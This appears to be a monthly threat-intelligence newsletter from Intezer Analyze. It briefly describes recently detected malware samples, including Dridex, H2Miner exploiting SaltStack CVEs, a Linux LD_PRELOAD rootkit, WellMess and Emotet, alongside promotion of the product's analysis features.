See below some of the threats our community detected this month
1. Fileless Dridex sample, originally with five detections in VirusTotal, contains a payload that unpacks itself as shellcode. Learn about Intezer Analyze’s NEW unpacking capabilities
2. H2Miner, with only two out of 59 detections in VirusTotal, targets vulnerable SaltStack instances using CVE-2020-11651/2. Exploitation of SaltStack Vulnerabilities Signals Increase in Cloud Server Attacks
3. Another H2Miner sample, also with two detections in VirusTotal, exploits vulnerabilities CVE-2020-11651/2.
4. Fully undetected Linux LD-PRELOAD userland rootkit uploaded from the United States and Russia, hides SSH connections via hooking fopen on /dev/net/tcp and conceals itself via hooking readdir.
5. Cross-platform wellmess Linux sample, written in Golang, has four detections in VirusTotal.
6. Emotet sample, uploaded from Japan, has five out of 70 detections in VirusTotal. Automatic unpacking in Intezer Analyze reveals the payload shares code with an older Emotet variant. Search by hash fccc6f6e8b036fd9536649cfaef73b6e to analyze the older variant in Intezer Analyze. Try it Now
Join the thousands of security professionals using the Intezer Analyze community edition to investigate suspicious files and devices. Sign up for free at analyze.intezer.com.
Check out the new features on our YouTube channel:
• NEW Malware Family View
• NEW Unpack Evasive Payloads in Memory
• NEW Search by String